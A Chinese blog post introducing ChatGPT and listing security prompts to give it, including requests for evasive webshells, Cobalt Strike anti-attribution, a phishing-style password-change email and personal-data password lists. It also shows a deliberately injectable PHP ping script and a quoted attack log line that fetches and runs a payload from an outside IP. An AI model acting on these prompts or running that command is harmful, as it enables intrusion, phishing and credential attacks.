文章目录
Chatgpt科普
- ChatGPT是什么?ChatGPT–可能很多人被这个缩写的名字搞糊涂了,第一眼无法看出到底什么意思,GPT 的英文原文是 Generative Pre-training Transformer(预训练生成模型),业界有人将 ChatGPT 概括为聊天机器人+搜索工具+文本创造工具的组合,或者简单理解它是一个生成式 AI(内容生成器)。
- ChatGPT能做什么? 它的主要功能是协助回答问题、提供信息和生成有关历史、科学、地理等各种主题的信息,这些信息仅限于它所接受的训练,但其知识在不断扩展。
- ChatGPT牛在哪里? (1)它是个通用的模型,只要提示词引导,就能快速适应不同领域。 (2)它能理解你的问题,只要给的引导越多,它就能给出你想要的答案。
- 安全行业影响: (1)整合多种恶意软件 (2)提升漏洞发现能力 (3)给新手攻击者赋能 (4)便于社会工程学攻击 (5)快速筛选和锁定目标 (6)模拟网络防御攻击技术
利用:
安全开发
1、如何使用Python写一个jwt爆破脚本?
2、如何使用Python写一个Webshell检测脚本?
3、如何使用Python写一个MS17010漏洞检测脚本?
4、使用PHP开发一个免杀混淆复杂的webshell脚本
5、在渗透测试靶机中,发现PHP脚本被禁用了敏感函数,如何生成一个绕过的webshell
逆向免杀
1、APK使用什么工具进行反编译?
2、常见脱壳工具有那些?
3、免杀中使用什么加壳效果好?
代码审计
1、下面代码会出现哪些安全漏洞?又该如何利用呢?
<?phpif(isset($_POST['Submit'])){// Get input$target=$_REQUEST['ip'];// Determine OS and execute the ping command.if(stristr(php_uname('s'),'Windows NT')){// Windows$cmd=shell_exec('ping '.$target);}else{// *nix$cmd=shell_exec('ping -c 4 '.$target);}// Feedback for the end user$html.="<pre>{$cmd}</pre>";}?>
2、Thinkphp历史漏洞有哪些?
3、shiro反序列化漏洞如何利用?
蓝队应急
0、平台项目:
蓝队针对攻击威胁感知平台项目有哪些?
1、日志分析:
103.178.229.152 - - [12/Mar/2023:07:16:02 +0800] “GET /shell?cd+/tmp;rm±rf+*;wget+128.199.134.42/jaws;sh+/tmp/jaws HTTP/1.1” 404 146 “-” “Hello, world”
2、流量检测:
写一个检测cobaltstrike payload的脚本
写一个Cobalstrike检测rules规则
APT社工学
1、防溯源:Cobaltstike如何防止被溯源
2、钓鱼邮件:由于系统升级,公司通知员工必须修改自己的密码,请在新业务网站上进行修改,帮我写一份规范的邮件通知
3、字典生成:用户名:xiaodi 电话:13512345678 QQ:471656814 密码组合?
其他相关:
网络安全渗透测试简历模版 早知道前几天投简历就用这个了 emmm
网络安全渗透测试报告模版
版权归原作者 今天是 几 号 所有, 如有侵权,请联系我们删除。